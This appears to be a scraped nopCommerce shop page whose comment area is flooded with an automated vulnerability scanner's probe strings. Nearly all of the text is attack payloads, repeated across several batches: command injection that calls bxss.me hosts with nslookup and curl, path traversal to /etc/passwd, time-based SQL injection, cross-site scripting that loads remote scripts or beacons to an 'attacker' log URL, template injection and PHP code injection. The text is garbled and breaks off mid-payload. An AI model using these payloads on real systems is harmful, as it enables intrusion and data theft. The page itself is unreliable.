For full feature list go to nopCommerce.com
Providing outstanding custom search engine optimization, web development services and e-commerce development solutions to our clients at a fair price in a professional manner.
This is a sample comment...
555
1dcskXL9VO
response.write(9908205*9040027)
'+response.write(9908205*9040027)+'
"+response.write(9908205*9040027)+"
<% response.write(9908205*9040027) %>
+response.write(9908205*9040027)'
/../../../../../../../../../../windows/system32/BITSADMIN.exe
echo alufrt$()\ amwbbk\nz^xyu||a #' &echo alufrt$()\ amwbbk\nz^xyu||a #|" &echo alufrt$()\ amwbbk\nz^xyu||a #
&echo basqym$()\ yznwqx\nz^xyu||a #' &echo basqym$()\ yznwqx\nz^xyu||a #|" &echo basqym$()\ yznwqx\nz^xyu||a #
555&echo ycmvbw$()\ weiift\nz^xyu||a #' &echo ycmvbw$()\ weiift\nz^xyu||a #|" &echo ycmvbw$()\ weiift\nz^xyu||a #
|echo rtitwm$()\ vsrkwl\nz^xyu||a #' |echo rtitwm$()\ vsrkwl\nz^xyu||a #|" |echo rtitwm$()\ vsrkwl\nz^xyu||a #
555|echo iuiauw$()\ xsklcw\nz^xyu||a #' |echo iuiauw$()\ xsklcw\nz^xyu||a #|" |echo iuiauw$()\ xsklcw\nz^xyu||a #
(nslookup -q=cname hitkmzmkgyqdo188ef.bxss.me||curl hitkmzmkgyqdo188ef.bxss.me))
$(nslookup -q=cname hitovtsnnnkvh3ac5f.bxss.me||curl hitovtsnnnkvh3ac5f.bxss.me)
&nslookup -q=cname hitrlbhoqoftjefe1d.bxss.me&'\"`0&nslookup -q=cname hitrlbhoqoftjefe1d.bxss.me&`'
&(nslookup -q=cname hitwutxsnnhbieb3d4.bxss.me||curl hitwutxsnnhbieb3d4.bxss.me)&'\"`0&(nslookup -q=cname hitwutxsnnhbieb3d4.bxss.me||curl hitwutxsnnhbieb3d4.bxss.me)&`'
|(nslookup -q=cname hitedcmxknahif9bf9.bxss.me||curl hitedcmxknahif9bf9.bxss.me)
`(nslookup -q=cname hituhlmxfegnw45c72.bxss.me||curl hituhlmxfegnw45c72.bxss.me)`
;(nslookup -q=cname hitbchksmpsfb8d20d.bxss.me||curl hitbchksmpsfb8d20d.bxss.me)|(nslookup -q=cname hitbchksmpsfb8d20d.bxss.me||curl hitbchksmpsfb8d20d.bxss.me)&(nslookup -q=cname hitbchksmpsfb8d20d.bxss.me||curl hitbchksmpsfb8d20d.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjmrgscekcdf1a8d.bxss.me||curl${IFS}hitjmrgscekcdf1a8d.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitepkeybfchs82f03.bxss.me||curl${IFS}hitepkeybfchs82f03.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitepkeybfchs82f03.bxss.me||curl${IFS}hitepkeybfchs82f03.bxss.me)&`'
../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../windows/win.ini
file:///etc/passwd
../555
555<esi:include src="http://bxss.me/rpb.png"/>
${9999273+9999275}
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
)
!(()&&!|*|*|
^(#$!@#$)(()))******
-1 OR 2+407-407-1=0+0+0+1 --
-1 OR 2+247-247-1=0+0+0+1
-1' OR 2+380-380-1=0+0+0+1 --
-1' OR 2+160-160-1=0+0+0+1 or '58SlI12D'='
-1" OR 2+594-594-1=0+0+0+1 --
'"()
555'&&sleep(27*1000)*khvhbs&&'
555"&&sleep(27*1000)*grjdws&&"
555'||sleep(27*1000)*syqvdk||'
555"||sleep(27*1000)*kvzbyg||"
'.gethostbyname(lc('hitbm'.'tzexjeudfdad8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(68).chr(117).chr(79).'
".gethostbyname(lc("hitzf"."arqmfggt35b29.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(77).chr(102).chr(73)."
gethostbyname(lc('hittv'.'jahrfvpife35c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(89).chr(104).chr(74)
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}\
'.print(md5(31337)).'
HttP://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555*if(now()=sysdate(),sleep(15),0)
"+"A".concat(70-3).concat(22*4).concat(114).concat(83).concat(112).concat(83)+(require"socket"Socket.gethostbyname("hityn"+"psnaodubca28c.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(115).concat(86).concat(111).concat(70)+(require'socket'Socket.gethostbyname('hitzg'+'muvpaoytd06c7.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(119).concat(69).concat(99).concat(82)+(require'socket'Socket.gethostbyname('hitpj'+'dmpqwoiw30842.bxss.me.')[3].to_s)
about-nopcommerce
xfs.bxss.me
about-nopcommerce/.
'"
<!--
555'"()&%<zzz><ScRiPt >23CF(9118)</ScRiPt>
'"()&%<zzz><ScRiPt >23CF(9456)</ScRiPt>
5559594659
bfg1175<s1﹥s2ʺs3ʹhjl1175
bfgx1922%C0%BEz1%C0%BCz2a%90bcxhjl1922
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
<%={{={@{#{${dfb}}%>
<th:t="${dfb}#foreach
1}}"}}'}}1%>"%>'%><%={{={@{#{${dfb}}%>
dfb{{98991*97996}}xca
dfb[[${98991*97996}]]xca
dfb__${98991*97996}__::.x
"dfbzzzzzzzzbbbccccdddeeexca".replace("z","o")
555<ScRiPt >23CF(9431)</ScRiPt>
555<WGSHLI>HK6BV[!+!]</WGSHLI>
555<script>23CF(9523)</script>
555<script>23CF(9627)</script>9627
555<ScR<ScRiPt>IpT>23CF(9963)</sCr<ScRiPt>IpT>
555<ScRiPt >23CF(9652)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9941></ScRiPt>
555<isindex type=image src=1 onerror=23CF(9144)>
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9072'>
555<body onload=23CF(9544)>
555<img src=//xss.bxss.me/t/dot.gif onload=23CF(9369)>
555<img src=xyz OnErRor=23CF(9727)>
555<img/src=">" onerror=alert(9039)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%32%33%43%46%289178%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\23CF(9120)\u003C/sCripT\u003E
555<ScRiPt>23CF(9931)</sCripT>
%F6<img zzz onmouseover=23CF(98341) //%F6>
555<input autofocus onfocus=23CF(9846)>
<a HrEF=http://xss.bxss.me></a>
<a HrEF=jaVaScRiPT:>
555}body{zzz:Expre/**/SSion(23CF(9538))}
555RYnD5<ScRiPt >23CF(9530)</ScRiPt>
555<WBKLN9>BTVL3[!+!]</WBKLN9>
555<ifRAme sRc=9372.com></IfRamE>
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555<ajrAvFQ x=9106>
555<img sRc='http://attacker-9493/log.php?
555<aoOk34M<
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1)); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:15' --
555toT2mwIv'; waitfor delay '0:0:15' --
555vbS34pZj'); waitfor delay '0:0:15' --
555QWEZAyMe')); waitfor delay '0:0:15' --
555-1 OR 921=(SELECT 921 FROM PG_SLEEP(15))--
555-1) OR 843=(SELECT 843 FROM PG_SLEEP(15))--
555-1)) OR 38=(SELECT 38 FROM PG_SLEEP(15))--
555MQVAJELG' OR 141=(SELECT 141 FROM PG_SLEEP(15))--
555ncxaLSwd') OR 588=(SELECT 588 FROM PG_SLEEP(15))--
555mDLdDFkR')) OR 98=(SELECT 98 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
555%C0%A7%C0%A2%2527%2522\'\"
@@ctkTs
response.write(9248786*9958338)
'+response.write(9248786*9958338)+'
"+response.write(9248786*9958338)+"
<% response.write(9248786*9958338) %>
+response.write(9248786*9958338)'
echo tcmrap$()\ bkmwyz\nz^xyu||a #' &echo tcmrap$()\ bkmwyz\nz^xyu||a #|" &echo tcmrap$()\ bkmwyz\nz^xyu||a #
&echo syqnwl$()\ luqeqq\nz^xyu||a #' &echo syqnwl$()\ luqeqq\nz^xyu||a #|" &echo syqnwl$()\ luqeqq\nz^xyu||a #
555&echo jxvbqp$()\ fxsmyd\nz^xyu||a #' &echo jxvbqp$()\ fxsmyd\nz^xyu||a #|" &echo jxvbqp$()\ fxsmyd\nz^xyu||a #
|echo rfpdes$()\ qagmfo\nz^xyu||a #' |echo rfpdes$()\ qagmfo\nz^xyu||a #|" |echo rfpdes$()\ qagmfo\nz^xyu||a #
555|echo damxll$()\ zhxbgl\nz^xyu||a #' |echo damxll$()\ zhxbgl\nz^xyu||a #|" |echo damxll$()\ zhxbgl\nz^xyu||a #
(nslookup -q=cname hitccakamsgmg8f952.bxss.me||curl hitccakamsgmg8f952.bxss.me))
$(nslookup -q=cname hitvdbnjqkxjhd3620.bxss.me||curl hitvdbnjqkxjhd3620.bxss.me)
&nslookup -q=cname hitypkpuwzdofeaa7e.bxss.me&'\"`0&nslookup -q=cname hitypkpuwzdofeaa7e.bxss.me&`'
&(nslookup -q=cname hitibazbhylryce379.bxss.me||curl hitibazbhylryce379.bxss.me)&'\"`0&(nslookup -q=cname hitibazbhylryce379.bxss.me||curl hitibazbhylryce379.bxss.me)&`'
|(nslookup -q=cname hitndstvrpbqa29fd1.bxss.me||curl hitndstvrpbqa29fd1.bxss.me)
`(nslookup -q=cname hitedbbpsqvftb9866.bxss.me||curl hitedbbpsqvftb9866.bxss.me)`
;(nslookup -q=cname hitwtmyqmjtuxfc52a.bxss.me||curl hitwtmyqmjtuxfc52a.bxss.me)|(nslookup -q=cname hitwtmyqmjtuxfc52a.bxss.me||curl hitwtmyqmjtuxfc52a.bxss.me)&(nslookup -q=cname hitwtmyqmjtuxfc52a.bxss.me||curl hitwtmyqmjtuxfc52a.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitdmqhoosdmc8654d.bxss.me||curl${IFS}hitdmqhoosdmc8654d.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hithpgijbkhiu3e94e.bxss.me||curl${IFS}hithpgijbkhiu3e94e.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hithpgijbkhiu3e94e.bxss.me||curl${IFS}hithpgijbkhiu3e94e.bxss.me)&`'
${9999735+9999077}
'.gethostbyname(lc('hitqa'.'qebuxqrt42f5e.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(109).chr(78).chr(120).chr(90).'
".gethostbyname(lc("hitol"."vqffkngtc2dbd.bxss.me."))."A".chr(67).chr(hex("58")).chr(118).chr(67).chr(118).chr(73)."
gethostbyname(lc('hitas'.'zayojyuo4ba5b.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(86).chr(114).chr(79)
555'&&sleep(27*1000)*cnhdzd&&'
555"&&sleep(27*1000)*fpixal&&"
555'||sleep(27*1000)*bvfzyl||'
555"||sleep(27*1000)*zmtcyw||"
"+"A".concat(70-3).concat(22*4).concat(100).concat(88).concat(113).concat(77)+(require"socket"Socket.gethostbyname("hitry"+"ykcqmqma9c01b.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(119).concat(88).concat(107).concat(81)+(require'socket'Socket.gethostbyname('hitol'+'mflegkohbe114.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(114).concat(68).concat(103).concat(82)+(require'socket'Socket.gethostbyname('hitiq'+'tiowgagocb43c.bxss.me.')[3].to_s)
555'"()&%<zzz><ScRiPt >PglF(9030)</ScRiPt>
555'"()&%<zzz><ScRiPt >wgIs(9418)</ScRiPt>
'"()&%<zzz><ScRiPt >PglF(9038)</ScRiPt>
'"()&%<zzz><ScRiPt >wgIs(9209)</ScRiPt>
5559193221
-1 OR 2+978-978-1=0+0+0+1 --
-1 OR 2+950-950-1=0+0+0+1
5559335613
-1' OR 2+460-460-1=0+0+0+1 --
bfg1271<s1﹥s2ʺs3ʹhjl1271
-1' OR 2+194-194-1=0+0+0+1 or 'u3I2dZhW'='
-1" OR 2+97-97-1=0+0+0+1 --
bfgx9918%C0%BEz1%C0%BCz2a%90bcxhjl9918
555<ScRiPt >PglF(9196)</ScRiPt>
555<WAG1SQ>D3PDO[!+!]</WAG1SQ>
555<script>PglF(9825)</script>
555<script>PglF(9522)</script>9522
555<ScR<ScRiPt>IpT>PglF(9174)</sCr<ScRiPt>IpT>
555<ScRiPt >PglF(9174)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9151></ScRiPt>
555<isindex type=image src=1 onerror=PglF(9721)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9265'>
555<body onload=PglF(9133)>
555<img src=//xss.bxss.me/t/dot.gif onload=PglF(9210)>
555<img src=xyz OnErRor=PglF(9188)>
555<img/src=">" onerror=alert(9966)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%50%67%6C%46%289266%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\PglF(9431)\u003C/sCripT\u003E
555<ScRiPt>PglF(9195)</sCripT>
%F6<img zzz onmouseover=PglF(90971) //%F6>
555<input autofocus onfocus=PglF(9402)>
555}body{zzz:Expre/**/SSion(PglF(9657))}
555CMB4s<ScRiPt >PglF(9906)</ScRiPt>
555<WP7QXX>D6HT9[!+!]</WP7QXX>
555<ifRAme sRc=9318.com></IfRamE>
555<ahXmjcj x=9440>
555<img sRc='http://attacker-9995/log.php?
555<aRqt6EH<
555'"()&%<zzz><ScRiPt >WPoK(9818)</ScRiPt>
'"()&%<zzz><ScRiPt >WPoK(9571)</ScRiPt>
response.write(9106299*9045924)
'+response.write(9106299*9045924)+'
"+response.write(9106299*9045924)+"
<% response.write(9106299*9045924) %>
+response.write(9106299*9045924)'
5559461624
echo xtrhfd$()\ athnxf\nz^xyu||a #' &echo xtrhfd$()\ athnxf\nz^xyu||a #|" &echo xtrhfd$()\ athnxf\nz^xyu||a #
&echo clisrl$()\ gfwmbo\nz^xyu||a #' &echo clisrl$()\ gfwmbo\nz^xyu||a #|" &echo clisrl$()\ gfwmbo\nz^xyu||a #
555&echo ubjzpa$()\ aookro\nz^xyu||a #' &echo ubjzpa$()\ aookro\nz^xyu||a #|" &echo ubjzpa$()\ aookro\nz^xyu||a #
|echo obilqw$()\ wqboia\nz^xyu||a #' |echo obilqw$()\ wqboia\nz^xyu||a #|" |echo obilqw$()\ wqboia\nz^xyu||a #
555|echo ikzbfh$()\ cxlzrx\nz^xyu||a #' |echo ikzbfh$()\ cxlzrx\nz^xyu||a #|" |echo ikzbfh$()\ cxlzrx\nz^xyu||a #
(nslookup -q=cname hitztaqkeoytsf850b.bxss.me||curl hitztaqkeoytsf850b.bxss.me))
$(nslookup -q=cname hitprcdnntzptf73f3.bxss.me||curl hitprcdnntzptf73f3.bxss.me)
&nslookup -q=cname hitdzctpmwjqq4b68c.bxss.me&'\"`0&nslookup -q=cname hitdzctpmwjqq4b68c.bxss.me&`'
&(nslookup -q=cname hithhdhdkzkfzdd1bc.bxss.me||curl hithhdhdkzkfzdd1bc.bxss.me)&'\"`0&(nslookup -q=cname hithhdhdkzkfzdd1bc.bxss.me||curl hithhdhdkzkfzdd1bc.bxss.me)&`'
|(nslookup -q=cname hiteavcsdkhowcc1b0.bxss.me||curl hiteavcsdkhowcc1b0.bxss.me)
`(nslookup -q=cname hitocftnathpn15e0c.bxss.me||curl hitocftnathpn15e0c.bxss.me)`
;(nslookup -q=cname hitwatuygsryfd6a0d.bxss.me||curl hitwatuygsryfd6a0d.bxss.me)|(nslookup -q=cname hitwatuygsryfd6a0d.bxss.me||curl hitwatuygsryfd6a0d.bxss.me)&(nslookup -q=cname hitwatuygsryfd6a0d.bxss.me||curl hitwatuygsryfd6a0d.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitrziwgedpij99dd2.bxss.me||curl${IFS}hitrziwgedpij99dd2.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitviaugnexvnef235.bxss.me||curl${IFS}hitviaugnexvnef235.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitviaugnexvnef235.bxss.me||curl${IFS}hitviaugnexvnef235.bxss.me)&`'
555SAQPaJh2'; waitfor delay '0:0:15' --
${10000393+9999287}
555'&&sleep(27*1000)*zxfhth&&'
555"&&sleep(27*1000)*fheuce&&"
555'||sleep(27*1000)*ohyskf||'
555"||sleep(27*1000)*fhwzir||"
'.gethostbyname(lc('hityi'.'logugzyb5ddfd.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(120).chr(71).chr(108).chr(88).'
".gethostbyname(lc("hitrt"."mpmtuhzt85095.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(69).chr(104).chr(70)."
gethostbyname(lc('hitcf'.'uotjxwgj3094a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(86).chr(103).chr(65)
555Nwe4m0eH'); waitfor delay '0:0:15' --
"+"A".concat(70-3).concat(22*4).concat(113).concat(70).concat(106).concat(87)+(require"socket"Socket.gethostbyname("hitvk"+"kbrotihh0f349.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(122).concat(88).concat(122).concat(65)+(require'socket'Socket.gethostbyname('hitvd'+'ehqeebok9defd.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(104).concat(90).concat(101).concat(74)+(require'socket'Socket.gethostbyname('hitkj'+'rqrnflhd2108f.bxss.me.')[3].to_s)
555'"()&%<zzz><ScRiPt >Z8oS(9436)</ScRiPt>
'"()&%<zzz><ScRiPt >Z8oS(9757)</ScRiPt>
5559190081
bfg9937<s1﹥s2ʺs3ʹhjl9937
-1 OR 2+709-709-1=0+0+0+1 --
-1 OR 2+690-690-1=0+0+0+1
-1' OR 2+840-840-1=0+0+0+1 --
-1' OR 2+361-361-1=0+0+0+1 or 'WGuBUanK'='
bfgx8941%C0%BEz1%C0%BCz2a%90bcxhjl8941
-1" OR 2+761-761-1=0+0+0+1 --
5555OaALCn6')); waitfor delay '0:0:15' --
555<ScRiPt >Z8oS(9922)</ScRiPt>
555<WBTSON>PZ1XP[!+!]</WBTSON>
555<script>Z8oS(9005)</script>
555<script>Z8oS(9318)</script>9318
555<ScR<ScRiPt>IpT>Z8oS(9926)</sCr<ScRiPt>IpT>
555<ScRiPt >Z8oS(9667)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9392></ScRiPt>
555<isindex type=image src=1 onerror=Z8oS(9075)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9887'>
555-1 OR 702=(SELECT 702 FROM PG_SLEEP(15))--
555<body onload=Z8oS(9848)>
555<img src=//xss.bxss.me/t/dot.gif onload=Z8oS(9168)>
555<img src=xyz OnErRor=Z8oS(9197)>
555<img/src=">" onerror=alert(9120)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%5A%38%6F%53%289617%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\Z8oS(9065)\u003C/sCripT\u003E
555<ScRiPt>Z8oS(9462)</sCripT>
%F6<img zzz onmouseover=Z8oS(95591) //%F6>
555<input autofocus onfocus=Z8oS(9476)>
555}body{zzz:Expre/**/SSion(Z8oS(9687))}
555-1) OR 385=(SELECT 385 FROM PG_SLEEP(15))--
555AeEcB<ScRiPt >Z8oS(9465)</ScRiPt>
555<WTRFRE>OORZG[!+!]</WTRFRE>
555<ifRAme sRc=9878.com></IfRamE>
555<aEwsuwW x=9734>
555<img sRc='http://attacker-9634/log.php?
555<a7yECvV<
555-1)) OR 221=(SELECT 221 FROM PG_SLEEP(15))--
555ndtrBV1e' OR 610=(SELECT 610 FROM PG_SLEEP(15))--
555La0h3FT2') OR 404=(SELECT 404 FROM PG_SLEEP(15))--
555K1WWaDna')) OR 526=(SELECT 526 FROM PG_SLEEP(15))--
@@q7Fxd
555SBEdVQZF'; waitfor delay '0:0:15' --
555xpuBXMPS'); waitfor delay '0:0:15' --
555ItTtIddy')); waitfor delay '0:0:15' --
555-1 OR 894=(SELECT 894 FROM PG_SLEEP(15))--
555-1) OR 650=(SELECT 650 FROM PG_SLEEP(15))--
555-1)) OR 405=(SELECT 405 FROM PG_SLEEP(15))--
5556fYXRvaG' OR 364=(SELECT 364 FROM PG_SLEEP(15))--
5559YUAbwCN') OR 277=(SELECT 277 FROM PG_SLEEP(15))--
555PjNYj6nt')) OR 324=(SELECT 324 FROM PG_SLEEP(15))--
@@hbrZD
555'"()&%<zzz><ScRiPt >KE1I(9379)</ScRiPt>
'"()&%<zzz><ScRiPt >KE1I(9016)</ScRiPt>
5559534774
bfg7453<s1﹥s2ʺs3ʹhjl7453
bfgx3160%C0%BEz1%C0%BCz2a%90bcxhjl3160
555<ScRiPt >KE1I(9401)</ScRiPt>
555<WT9CME>OKSXS[!+!]</WT9CME>
555<script>KE1I(9746)</script>
555<script>KE1I(9708)</script>9708
555<ScR<ScRiPt>IpT>KE1I(9590)</sCr<ScRiPt>IpT>
555<ScRiPt >KE1I(9972)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9571></ScRiPt>
555<isindex type=image src=1 onerror=KE1I(9439)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9814'>
555<body onload=KE1I(9979)>
555<img src=//xss.bxss.me/t/dot.gif onload=KE1I(9521)>
555<img src=xyz OnErRor=KE1I(9872)>
555<img/src=">" onerror=alert(9679)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%4B%45%31%49%289030%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\KE1I(9501)\u003C/sCripT\u003E
555<ScRiPt>KE1I(9346)</sCripT>
%F6<img zzz onmouseover=KE1I(96591) //%F6>
555<input autofocus onfocus=KE1I(9299)>
555}body{zzz:Expre/**/SSion(KE1I(9542))}
555Nkbzd<ScRiPt >KE1I(9514)</ScRiPt>
555<WXSNZ0>96FJR[!+!]</WXSNZ0>
555<ifRAme sRc=9296.com></IfRamE>
555<at5fpU4 x=9130>
555<img sRc='http://attacker-9729/log.php?
555<aU5iJ8Q<
555'"()&%<zzz><ScRiPt >1Bof(9431)</ScRiPt>
'"()&%<zzz><ScRiPt >1Bof(9526)</ScRiPt>
5559048298
bfg10104<s1﹥s2ʺs3ʹhjl10104
bfgx4217%C0%BEz1%C0%BCz2a%90bcxhjl4217
555<ScRiPt >1Bof(9912)</ScRiPt>
555<WF2DB5>I5S8F[!+!]</WF2DB5>
555<script>1Bof(9123)</script>
555<script>1Bof(9469)</script>9469
555<ScR<ScRiPt>IpT>1Bof(9744)</sCr<ScRiPt>IpT>
555<ScRiPt >1Bof(9949)</ScRiPt>
555<ScRiPt/zzz src=//xss.bxss.me/t/xss.js?9450></ScRiPt>
555<isindex type=image src=1 onerror=1Bof(9197)>
555<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9378'>
555<body onload=1Bof(9195)>
555<img src=//xss.bxss.me/t/dot.gif onload=1Bof(9127)>
555<img src=xyz OnErRor=1Bof(9358)>
555<img/src=">" onerror=alert(9181)>
%35%35%35%3C%53%63%52%69%50%74%20%3E%31%42%6F%66%289562%29%3C%2F%73%43%72%69%70%54%3E
555\u003CScRiPt\1Bof(9843)\u003C/sCripT\u003E
555<ScRiPt>1Bof(9954)</sCripT>
%F6<img zzz onmouseover=1Bof(92451) //%F6>
555<input autofocus onfocus=1Bof(9322)>
555}body{zzz:Expre/**/SSion(1Bof(9277))}
5557QKQ4<ScRiPt >1Bof(9936)</ScRiPt>
555<WAV0C8>MJRRB[!+!]</WAV0C8>
555<ifRAme sRc=9889.com></IfRamE>
555<anf2FlJ x=9557>
555<img sRc='http://attacker-9203/log.php?
555<a5GmuNB<
This is a sample comment...
555
1dcskXL9VO
555
response.write(9908205*9040027)
'+response.write(9908205*9040027)+'
"+response.write(9908205*9040027)+"
<% response.write(9908205*9040027) %>
+response.write(9908205*9040027)'
555
555
555
555
555
/../../../../../../../../../../windows/system32/BITSADMIN.exe
555
echo alufrt$()\ amwbbk\nz^xyu||a #' &echo alufrt$()\ amwbbk\nz^xyu||a #|" &echo alufrt$()\ amwbbk\nz^xyu||a #
&echo basqym$()\ yznwqx\nz^xyu||a #' &echo basqym$()\ yznwqx\nz^xyu||a #|" &echo basqym$()\ yznwqx\nz^xyu||a #
555&echo ycmvbw$()\ weiift\nz^xyu||a #' &echo ycmvbw$()\ weiift\nz^xyu||a #|" &echo ycmvbw$()\ weiift\nz^xyu||a #
|echo rtitwm$()\ vsrkwl\nz^xyu||a #' |echo rtitwm$()\ vsrkwl\nz^xyu||a #|" |echo rtitwm$()\ vsrkwl\nz^xyu||a #
555|echo iuiauw$()\ xsklcw\nz^xyu||a #' |echo iuiauw$()\ xsklcw\nz^xyu||a #|" |echo iuiauw$()\ xsklcw\nz^xyu||a #
(nslookup -q=cname hitkmzmkgyqdo188ef.bxss.me||curl hitkmzmkgyqdo188ef.bxss.me))
$(nslookup -q=cname hitovtsnnnkvh3ac5f.bxss.me||curl hitovtsnnnkvh3ac5f.bxss.me)
&nslookup -q=cname hitrlbhoqoftjefe1d.bxss.me&'\"`0&nslookup -q=cname hitrlbhoqoftjefe1d.bxss.me&`'
&(nslookup -q=cname hitwutxsnnhbieb3d4.bxss.me||curl hitwutxsnnhbieb3d4.bxss.me)&'\"`0&(nslookup -q=cname hitwutxsnnhbieb3d4.bxss.me||curl hitwutxsnnhbieb3d4.bxss.me)&`'
|(nslookup -q=cname hitedcmxknahif9bf9.bxss.me||curl hitedcmxknahif9bf9.bxss.me)
`(nslookup -q=cname hituhlmxfegnw45c72.bxss.me||curl hituhlmxfegnw45c72.bxss.me)`
;(nslookup -q=cname hitbchksmpsfb8d20d.bxss.me||curl hitbchksmpsfb8d20d.bxss.me)|(nslookup -q=cname hitbchksmpsfb8d20d.bxss.me||curl hitbchksmpsfb8d20d.bxss.me)&(nslookup -q=cname hitbchksmpsfb8d20d.bxss.me||curl hitbchksmpsfb8d20d.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hitjmrgscekcdf1a8d.bxss.me||curl${IFS}hitjmrgscekcdf1a8d.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitepkeybfchs82f03.bxss.me||curl${IFS}hitepkeybfchs82f03.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitepkeybfchs82f03.bxss.me||curl${IFS}hitepkeybfchs82f03.bxss.me)&`'
555
../../../../../../../../../../../../../../etc/passwd
555
../../../../../../../../../../../../../../windows/win.ini
555
file:///etc/passwd
555
555
555
../555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555<esi:include src="http://bxss.me/rpb.png"/>
555
555
${9999273+9999275}
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
../../../../../../../../../../../../../../etc/shells
c:/windows/win.ini
bxss.me
555
)
!(()&&!|*|*|
555
^(#$!@#$)(()))******
555
555
555
555
555
555
-1 OR 2+407-407-1=0+0+0+1 --
555
555
-1 OR 2+247-247-1=0+0+0+1
555
-1' OR 2+380-380-1=0+0+0+1 --
-1' OR 2+160-160-1=0+0+0+1 or '58SlI12D'='
-1" OR 2+594-594-1=0+0+0+1 --
555
'"()
555'&&sleep(27*1000)*khvhbs&&'
555"&&sleep(27*1000)*grjdws&&"
555'||sleep(27*1000)*syqvdk||'
555"||sleep(27*1000)*kvzbyg||"
555
555
555
555
'.gethostbyname(lc('hitbm'.'tzexjeudfdad8.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(68).chr(117).chr(79).'
555
".gethostbyname(lc("hitzf"."arqmfggt35b29.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(77).chr(102).chr(73)."
555
gethostbyname(lc('hittv'.'jahrfvpife35c.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(89).chr(104).chr(74)
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
555
555
555
HttP://bxss.me/t/xss.html?%00
555
bxss.me/t/xss.html?%00
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
"+"A".concat(70-3).concat(22*4).concat(114).concat(83).concat(112).concat(83)+(require"socket"
